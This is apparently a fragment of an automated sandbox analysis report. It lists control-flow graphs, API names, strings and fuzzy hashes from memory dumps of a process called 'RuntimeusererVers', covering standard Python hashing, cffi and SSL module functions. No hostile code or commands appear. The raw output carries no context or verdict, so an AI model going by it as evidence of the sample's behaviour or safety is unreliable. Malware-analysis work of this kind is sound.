                                                                                                                                                                                                                                          control_flow_graph 487 7ff81e4e1000-7ff81e4e1039 488 7ff81e4e1186-7ff81e4e1194 487->488 489 7ff81e4e103f-7ff81e4e107f PyModule_GetState _Py_hashtable_get 487->489 490 7ff81e4e1262 488->490 491 7ff81e4e119a-7ff81e4e11a5 PyObject_CheckBuffer 488->491 492 7ff81e4e1085-7ff81e4e1087 489->492 493 7ff81e4e4b09-7ff81e4e4b0c 489->493 496 7ff81e4e1269-7ff81e4e1273 PyErr_SetString 490->496 494 7ff81e4e4aa8-7ff81e4e4aaf 491->494 495 7ff81e4e11ab-7ff81e4e11bf PyObject_GetBuffer 491->495 499 7ff81e4e1156-7ff81e4e115a 492->499 500 7ff81e4e108d-7ff81e4e1091 492->500 497 7ff81e4e4b20-7ff81e4e4b29 EVP_get_digestbyname 493->497 498 7ff81e4e4b0e-7ff81e4e4b12 493->498 494->496 503 7ff81e4e11c5-7ff81e4e11ca 495->503 504 7ff81e4e1279-7ff81e4e1286 495->504 496->504 510 7ff81e4e4b31-7ff81e4e4b35 497->510 498->497 507 7ff81e4e4b14-7ff81e4e4b18 498->507 505 7ff81e4e1160-7ff81e4e1164 499->505 506 7ff81e4e4adc-7ff81e4e4ae0 499->506 501 7ff81e4e1097 500->501 502 7ff81e4e124f-7ff81e4e1259 EVP_get_digestbyname 500->502 509 7ff81e4e109b-7ff81e4e109e 501->509 502->490 503->489 511 7ff81e4e11d0-7ff81e4e4ad7 PyErr_SetString PyBuffer_Release 503->511 513 7ff81e4e123c-7ff81e4e124a EVP_get_digestbyname 505->513 514 7ff81e4e116a-7ff81e4e116e 505->514 506->500 512 7ff81e4e4ae6-7ff81e4e4aea 506->512 507->497 508 7ff81e4e4b1a-7ff81e4e4b1e 507->508 508->497 515 7ff81e4e4af0-7ff81e4e4b04 call 7ff81e4e2300 508->515 509->515 516 7ff81e4e10a4-7ff81e4e10b2 EVP_MD_flags 509->516 517 7ff81e4e4b37-7ff81e4e4b3a _Py_Dealloc 510->517 518 7ff81e4e4b40-7ff81e4e4b47 PyErr_NoMemory 510->518 511->504 512->500 512->515 513->514 514->509 520 7ff81e4e1147-7ff81e4e1151 PyModule_GetState 516->520 521 7ff81e4e10b8 PyModule_GetState 516->521 517->518 522 7ff81e4e1117-7ff81e4e1132 518->522 524 7ff81e4e10be-7ff81e4e10cd _PyObject_New 520->524 521->524 525 7ff81e4e1204-7ff81e4e120f PyBuffer_Release 522->525 526 7ff81e4e1138-7ff81e4e1146 522->526 524->522 528 7ff81e4e10cf-7ff81e4e10e0 EVP_MD_CTX_new 524->528 525->526 528->510 529 7ff81e4e10e6-7ff81e4e10eb 528->529 530 7ff81e4e10f1-7ff81e4e1103 EVP_DigestInit_ex 529->530 531 7ff81e4e1173-7ff81e4e1181 EVP_MD_CTX_set_flags 529->531 532 7ff81e4e4b4c-7ff81e4e4b63 call 7ff81e4e2300 530->532 533 7ff81e4e1109-7ff81e4e1111 530->533 531->530 532->522 540 7ff81e4e4b69 532->540 533->522 535 7ff81e4e11d5-7ff81e4e11dd 533->535 535->522 536 7ff81e4e11e3-7ff81e4e11ea 535->536 538 7ff81e4e1214-7ff81e4e123a PyEval_SaveThread call 7ff81e4e1820 PyEval_RestoreThread 536->538 539 7ff81e4e11ec-7ff81e4e11f4 call 7ff81e4e1820 536->539 546 7ff81e4e11f6-7ff81e4e11f9 538->546 539->546 542 7ff81e4e4b77-7ff81e4e4b81 _Py_Dealloc 540->542 542->522 546->522 547 7ff81e4e11ff-7ff81e4e4b71 546->547 547->522 547->542
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Module_Object_P_get_digestbynameState$BufferBuffer_Err_Eval_ReleaseStringThread$CheckD_flagsDeallocDigestInit_exPy_hashtable_getRestoreSaveX_newX_set_flags
                                                                                                                                                                                                                                          • String ID: Buffer must be single dimension$Strings must be encoded before hashing$object supporting the buffer API required$unsupported hash type %s
                                                                                                                                                                                                                                          • API String ID: 1905720158-26133693
                                                                                                                                                                                                                                          • Opcode ID: 4c326127dbcfc7f4e76e7507b2dad3fd2dc672b2a1a0208813b5d74c27768c37
                                                                                                                                                                                                                                          • Instruction ID: f8f228496b1bb25b0662ec050fea5b94f1908660ea5f7f3a87903dbd55b87541
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4c326127dbcfc7f4e76e7507b2dad3fd2dc672b2a1a0208813b5d74c27768c37
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10911E21E4CF4381EA659B21A858AB963A4BF89BF1F145335DD4E47B94DF6CF8E48300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 779 7ff81e517700-7ff81e517746 _PyArg_ParseTupleAndKeywords_SizeT 780 7ff81e517748-7ff81e51774f 779->780 781 7ff81e5177b3-7ff81e5177c2 779->781 782 7ff81e517751-7ff81e51775d PyDict_New 780->782 783 7ff81e517763-7ff81e517777 PyDict_GetItem 780->783 782->781 784 7ff81e51775f 782->784 785 7ff81e51777d-7ff81e517789 PyThread_allocate_lock 783->785 786 7ff81e517836-7ff81e517848 783->786 784->783 785->781 789 7ff81e51778b-7ff81e5177a8 PyCapsule_New 785->789 787 7ff81e51784a-7ff81e51785a 786->787 788 7ff81e51785b-7ff81e517871 PyCapsule_GetPointer 786->788 790 7ff81e517873-7ff81e517877 788->790 791 7ff81e517896-7ff81e5178c7 PyEval_SaveThread PyThread_acquire_lock PyEval_RestoreThread PyDict_GetItem 788->791 792 7ff81e5177aa-7ff81e5177ad PyThread_free_lock 789->792 793 7ff81e5177c3-7ff81e5177df PyTuple_Pack 789->793 790->781 794 7ff81e51787d-7ff81e517895 _Py_Dealloc 790->794 795 7ff81e5178c9-7ff81e5178d4 791->795 796 7ff81e5178df-7ff81e5178f7 _PyObject_CallFunction_SizeT 791->796 792->781 797 7ff81e5177ea-7ff81e5177ed 793->797 798 7ff81e5177e1-7ff81e5177e4 _Py_Dealloc 793->798 795->796 799 7ff81e5178d6-7ff81e5178dd 795->799 800 7ff81e5178f9-7ff81e517919 PyTuple_Pack 796->800 801 7ff81e51795b-7ff81e517968 PyThread_release_lock 796->801 797->781 802 7ff81e5177ef-7ff81e517817 _PyObject_CallMethod_SizeT 797->802 798->797 799->801 805 7ff81e51791b-7ff81e51792e PyDict_SetItem 800->805 806 7ff81e517930-7ff81e517934 800->806 803 7ff81e51796a-7ff81e51796d _Py_Dealloc 801->803 804 7ff81e517973-7ff81e517983 801->804 807 7ff81e517819-7ff81e51781c _Py_Dealloc 802->807 808 7ff81e517822-7ff81e517825 802->808 803->804 805->806 809 7ff81e517946-7ff81e51794b 805->809 810 7ff81e51793f-7ff81e517944 806->810 811 7ff81e517936-7ff81e517939 _Py_Dealloc 806->811 807->808 808->781 812 7ff81e517827-7ff81e51782b 808->812 813 7ff81e517956 809->813 814 7ff81e51794d-7ff81e517950 _Py_Dealloc 809->814 810->809 810->813 811->810 812->786 815 7ff81e51782d-7ff81e517830 _Py_Dealloc 812->815 813->801 814->813 815->786
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Dict_$ItemSize$CallCapsule_Eval_Object_PackThreadTuple_$Arg_Function_Keywords_Method_ParsePointerRestoreSaveThread_acquire_lockThread_allocate_lockThread_free_lockThread_release_lockTuple
                                                                                                                                                                                                                                          • String ID: cffi_init_once_lock$setdefault
                                                                                                                                                                                                                                          • API String ID: 1006512166-1600032183
                                                                                                                                                                                                                                          • Opcode ID: 798fb11d3c42691da869e6142c12ace403bc6e186e8ec3f989e4286329429938
                                                                                                                                                                                                                                          • Instruction ID: 065c2b7518bc9af4c70ea69ed9b928147e884e3e5f2cec7a6c1ecc847aff32e2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 798fb11d3c42691da869e6142c12ace403bc6e186e8ec3f989e4286329429938
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F711825A09F0281EA599F2AAD642B963A1AF49FF4F080235DE4E06764EF3DF585C740

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 816 7ff81e519c50-7ff81e519c92 _errno GetLastError TlsGetValue 817 7ff81e519cba-7ff81e519cbd 816->817 818 7ff81e519c94-7ff81e519ca3 malloc 816->818 819 7ff81e519cc0-7ff81e519cc5 817->819 818->819 820 7ff81e519ca5-7ff81e519cb4 TlsSetValue 818->820 821 7ff81e519cd1-7ff81e519cec call 7ff81e501300 PyThreadState_Get PyInterpreterState_GetDict 819->821 822 7ff81e519cc7-7ff81e519ccc 819->822 820->817 827 7ff81e519dd9-7ff81e519dec call 7ff81e50b1b0 PyGILState_Release 821->827 828 7ff81e519cf2-7ff81e519cfd call 7ff81e519950 821->828 824 7ff81e519d54-7ff81e519d8b __acrt_iob_func call 7ff81e501150 memset 822->824 830 7ff81e519df2-7ff81e519e04 TlsGetValue 824->830 827->830 837 7ff81e519cff-7ff81e519d04 828->837 838 7ff81e519d06-7ff81e519d15 PyLong_FromVoidPtr 828->838 835 7ff81e519e2c-7ff81e519e3e SetLastError _errno 830->835 836 7ff81e519e06-7ff81e519e15 malloc 830->836 839 7ff81e519e40-7ff81e519e5a 835->839 836->839 840 7ff81e519e17-7ff81e519e26 TlsSetValue 836->840 841 7ff81e519d4c-7ff81e519d4e PyGILState_Release 837->841 842 7ff81e519d24-7ff81e519d37 PyDict_GetItem 838->842 843 7ff81e519d17-7ff81e519d22 PyErr_Clear 838->843 840->835 841->824 844 7ff81e519d39-7ff81e519d3c _Py_Dealloc 842->844 845 7ff81e519d42-7ff81e519d45 842->845 843->841 844->845 846 7ff81e519d8d-7ff81e519db7 PyThreadState_Get PyInterpreterState_GetDict 845->846 847 7ff81e519d47 845->847 848 7ff81e519db9-7ff81e519dbd 846->848 849 7ff81e519dc5-7ff81e519dc8 846->849 847->841 848->849 850 7ff81e519dbf _Py_Dealloc 848->850 849->827 851 7ff81e519dca-7ff81e519dce 849->851 850->849 851->827 852 7ff81e519dd0-7ff81e519dd3 _Py_Dealloc 851->852 852->827
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • extern "Python": function %s() called, but %s. Returning 0., xrefs: 00007FF81E519D6B
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: State_$Value$Dealloc$DictErrorInterpreterLastReleaseThread_errnomalloc$ClearDict_Err_FromItemLong_Void__acrt_iob_funcfprintfmemset
                                                                                                                                                                                                                                          • String ID: extern "Python": function %s() called, but %s. Returning 0.
                                                                                                                                                                                                                                          • API String ID: 384508774-1240277920
                                                                                                                                                                                                                                          • Opcode ID: 191972da915f526837c2da820d8dae616a5c72836fa919b7908825d891de8d14
                                                                                                                                                                                                                                          • Instruction ID: a184bcd279bbb2f2e44352510abf8a1a9df050f3de4d94f1d77144a5a3d2c936
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 191972da915f526837c2da820d8dae616a5c72836fa919b7908825d891de8d14
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3251DA35A09F4286EA599F21EC642B963B0FF48BE4F084639DA1E07755EF3DF9548340

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 853 7ff81e135f2c-7ff81e135f6c SSL_get_servername PyGILState_Ensure 854 7ff81e135f6e-7ff81e135f78 PyGILState_Release 853->854 855 7ff81e135f7d-7ff81e135f92 SSL_get_ex_data 853->855 856 7ff81e136015-7ff81e136033 854->856 857 7ff81e135f9d-7ff81e135fa3 PyWeakref_GetObject 855->857 858 7ff81e135f94-7ff81e135f9b 855->858 859 7ff81e135fa6-7ff81e135fb3 857->859 858->857 858->859 860 7ff81e135ff1-7ff81e135ff5 859->860 861 7ff81e135fb5-7ff81e135fb8 859->861 862 7ff81e136000-7ff81e136010 PyGILState_Release 860->862 863 7ff81e135ff7-7ff81e135ffa _Py_Dealloc 860->863 864 7ff81e135fba-7ff81e135fd2 PyObject_CallFunctionObjArgs 861->864 865 7ff81e135fd7-7ff81e135fe6 PyBytes_FromString 861->865 862->856 863->862 866 7ff81e1360a2-7ff81e1360a6 864->866 867 7ff81e135fe8-7ff81e135feb PyErr_WriteUnraisable 865->867 868 7ff81e136034-7ff81e13604d PyUnicode_FromEncodedObject 865->868 871 7ff81e1360a8-7ff81e1360ab _Py_Dealloc 866->871 872 7ff81e1360b1-7ff81e1360b4 866->872 867->860 869 7ff81e136069-7ff81e13606d 868->869 870 7ff81e13604f-7ff81e13605c PyErr_WriteUnraisable 868->870 874 7ff81e136078-7ff81e136097 PyObject_CallFunctionObjArgs 869->874 875 7ff81e13606f-7ff81e136072 _Py_Dealloc 869->875 870->860 873 7ff81e13605e-7ff81e136067 _Py_Dealloc 870->873 871->872 876 7ff81e1360cc-7ff81e1360d3 872->876 877 7ff81e1360b6-7ff81e1360ca PyErr_WriteUnraisable 872->877 873->860 874->866 880 7ff81e136099-7ff81e13609c _Py_Dealloc 874->880 875->874 878 7ff81e136101-7ff81e136105 876->878 879 7ff81e1360d5-7ff81e1360ea PyLong_AsLong PyErr_Occurred 876->879 881 7ff81e136110-7ff81e13611b PyGILState_Release 877->881 878->881 884 7ff81e136107-7ff81e13610a _Py_Dealloc 878->884 882 7ff81e1360fc 879->882 883 7ff81e1360ec-7ff81e1360f5 PyErr_WriteUnraisable 879->883 880->866 881->856 882->878 883->882 884->881
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_State_$ReleaseUnraisableWrite$ArgsCallFunctionObjectObject_$EncodedEnsureFromL_get_ex_dataL_get_servernameLongLong_OccurredUnicode_Weakref_
                                                                                                                                                                                                                                          • String ID: ascii
                                                                                                                                                                                                                                          • API String ID: 3188396730-3510295289
                                                                                                                                                                                                                                          • Opcode ID: c5a90ee6353e318aa7875a3d54ac4386d04088e56dbf5d2ee6200097549e08cf
                                                                                                                                                                                                                                          • Instruction ID: c8f253fdce24dbeb8ac48ed6e6eedd91628ec2cc30d24cd163f9ba1c40171e71
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5a90ee6353e318aa7875a3d54ac4386d04088e56dbf5d2ee6200097549e08cf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 41510425A09E5286FA149F22A91923D77A0BF89FF6F844630DE4E07B54DF3CF4968304

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 955 7ff81e4e1e20-7ff81e4e1e5b 956 7ff81e4e2056 955->956 957 7ff81e4e1e61-7ff81e4e1ec6 955->957 959 7ff81e4e205f-7ff81e4e20a1 _PyArg_UnpackKeywords 956->959 958 7ff81e4e1ecc-7ff81e4e1ed4 957->958 957->959 958->959 962 7ff81e4e1eda-7ff81e4e1edd 958->962 960 7ff81e4e20a7 959->960 961 7ff81e4e1ee3-7ff81e4e1ef4 959->961 965 7ff81e4e1fee-7ff81e4e2014 960->965 963 7ff81e4e20ac-7ff81e4e20ca _PyArg_BadArgument 961->963 964 7ff81e4e1efa-7ff81e4e1f13 PyUnicode_AsUTF8AndSize 961->964 962->959 962->961 963->965 966 7ff81e4e1fe6 964->966 967 7ff81e4e1f19 964->967 968 7ff81e4e2016-7ff81e4e201b PyBuffer_Release 965->968 969 7ff81e4e2021-7ff81e4e202a 965->969 966->965 970 7ff81e4e1f20-7ff81e4e1f27 967->970 968->969 971 7ff81e4e202c-7ff81e4e2034 PyBuffer_Release 969->971 972 7ff81e4e203a-7ff81e4e2055 call 7ff81e4e3c20 969->972 970->970 973 7ff81e4e1f29-7ff81e4e1f2e 970->973 971->972 975 7ff81e4e1f34-7ff81e4e1f48 PyObject_GetBuffer 973->975 976 7ff81e4e4d78-7ff81e4e4d90 PyErr_SetString 973->976 975->966 978 7ff81e4e1f4e-7ff81e4e1f5d PyBuffer_IsContiguous 975->978 976->966 979 7ff81e4e4d95-7ff81e4e4db5 _PyArg_BadArgument 978->979 980 7ff81e4e1f63-7ff81e4e1f7a PyObject_GetBuffer 978->980 979->966 980->966 981 7ff81e4e1f7c-7ff81e4e1f8e PyBuffer_IsContiguous 980->981 982 7ff81e4e1f94-7ff81e4e1fab PyLong_AsLong 981->982 983 7ff81e4e4dba-7ff81e4e4dda _PyArg_BadArgument 981->983 984 7ff81e4e1fb1-7ff81e4e1fb4 982->984 985 7ff81e4e20cf-7ff81e4e20d8 PyErr_Occurred 982->985 983->966 986 7ff81e4e1fb6 984->986 987 7ff81e4e1fba-7ff81e4e1fdb call 7ff81e4e20f0 984->987 985->984 988 7ff81e4e20de 985->988 986->987 990 7ff81e4e1fde 987->990 988->990 990->966
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Buffer_$Arg_BufferContiguousObject_Release$ArgumentErr_KeywordsLongLong_OccurredSizeUnicode_Unpack
                                                                                                                                                                                                                                          • String ID: argument 'hash_name'$argument 'password'$argument 'salt'$contiguous buffer$embedded null character$pbkdf2_hmac$str
                                                                                                                                                                                                                                          • API String ID: 448224016-2023054051
                                                                                                                                                                                                                                          • Opcode ID: 0315e8822ebb32e9b92e5fa0fd473f87c62cbae28dce2236d2c6d06a2981c936
                                                                                                                                                                                                                                          • Instruction ID: c40ff52c5c18a5d04305156fcf46b560ed5168c36680c25e112cb479de576c19
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0315e8822ebb32e9b92e5fa0fd473f87c62cbae28dce2236d2c6d06a2981c936
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE811B22A08F8782EA60CB11E844BB963A1FB99BF4F445335DA5D47A95DF3CF5A4C700

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 992 7ff81e4e5568-7ff81e4e5578 993 7ff81e4e559b-7ff81e4e55d5 992->993 994 7ff81e4e557a-7ff81e4e5595 _PyArg_CheckPositional 992->994 998 7ff81e4e5692-7ff81e4e569d PyObject_CheckBuffer 993->998 999 7ff81e4e55db-7ff81e4e55e9 993->999 994->993 995 7ff81e4e5597-7ff81e4e55b1 994->995 1001 7ff81e4e569f-7ff81e4e56aa PyObject_CheckBuffer 998->1001 1002 7ff81e4e56da-7ff81e4e56ee PyObject_GetBuffer 998->1002 999->998 1000 7ff81e4e55ef-7ff81e4e55f3 999->1000 1006 7ff81e4e55f5-7ff81e4e5601 _PyUnicode_Ready 1000->1006 1007 7ff81e4e5607-7ff81e4e560b 1000->1007 1001->1002 1003 7ff81e4e56ac-7ff81e4e56d5 PyErr_Format 1001->1003 1004 7ff81e4e56f0-7ff81e4e56f5 1002->1004 1005 7ff81e4e568b-7ff81e4e568d 1002->1005 1008 7ff81e4e57ad-7ff81e4e57bd 1003->1008 1011 7ff81e4e56f7-7ff81e4e5708 PyErr_SetString 1004->1011 1012 7ff81e4e5720-7ff81e4e5734 PyObject_GetBuffer 1004->1012 1005->1008 1006->1005 1006->1007 1009 7ff81e4e560d-7ff81e4e5619 _PyUnicode_Ready 1007->1009 1010 7ff81e4e561b-7ff81e4e5629 1007->1010 1009->1005 1009->1010 1013 7ff81e4e5674-7ff81e4e5685 PyErr_SetString 1010->1013 1014 7ff81e4e562b-7ff81e4e5636 1010->1014 1015 7ff81e4e570e-7ff81e4e571b PyBuffer_Release 1011->1015 1012->1015 1016 7ff81e4e5736-7ff81e4e573e 1012->1016 1013->1005 1017 7ff81e4e5645 1014->1017 1018 7ff81e4e5638-7ff81e4e5643 1014->1018 1015->1008 1019 7ff81e4e5771-7ff81e4e579f call 7ff81e4e6124 PyBuffer_Release * 2 1016->1019 1020 7ff81e4e5740-7ff81e4e576f PyErr_SetString PyBuffer_Release * 2 1016->1020 1021 7ff81e4e5649-7ff81e4e564d 1017->1021 1018->1021 1027 7ff81e4e57a5-7ff81e4e57a7 PyBool_FromLong 1019->1027 1020->1008 1023 7ff81e4e565c 1021->1023 1024 7ff81e4e564f-7ff81e4e565a 1021->1024 1026 7ff81e4e5660-7ff81e4e566f call 7ff81e4e6124 1023->1026 1024->1026 1026->1027 1027->1008
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ReadyUnicode_$Arg_Bool_CheckFromLongPositional
                                                                                                                                                                                                                                          • String ID: Buffer must be single dimension$compare_digest$comparing strings with non-ASCII characters is not supported$unsupported operand types(s) or combination of types: '%.100s' and '%.100s'
                                                                                                                                                                                                                                          • API String ID: 960716163-2538118963
                                                                                                                                                                                                                                          • Opcode ID: fb16102ad7aedabbae2b720364eef6ebaee46cbfe74884b07019a587325ceb3c
                                                                                                                                                                                                                                          • Instruction ID: 7645c252669f71b215d1bfec7a5813b67cf9cb86b0a5e7eac217cf0db28b9ab2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb16102ad7aedabbae2b720364eef6ebaee46cbfe74884b07019a587325ceb3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99618E65A08E4382EB64CB25E458A792361FF84BF4F144331DA5E476A4EF2CF4E5C740

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: State_Thread$StateThisValue$ClearDeallocDeleteDictDict_EnsureErrorEval_FatalFuncItemObject_RestoreStringThread_acquire_lockThread_release_lockUncheckedmalloc
                                                                                                                                                                                                                                          • String ID: cffi.thread.canary$cffi: invalid ThreadCanaryObj->tstate$thread_canary_free_zombies
                                                                                                                                                                                                                                          • API String ID: 1895661259-237290086
                                                                                                                                                                                                                                          • Opcode ID: f2e2fc1221ed4e2d4d115be6e6ae4b52d225a02831b9e2bcfc9014c7914a76ce
                                                                                                                                                                                                                                          • Instruction ID: f8009ff6d55231bec0820b64e0e4abc6c92b1a615e7fa59fc764e02da0e0032b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2e2fc1221ed4e2d4d115be6e6ae4b52d225a02831b9e2bcfc9014c7914a76ce
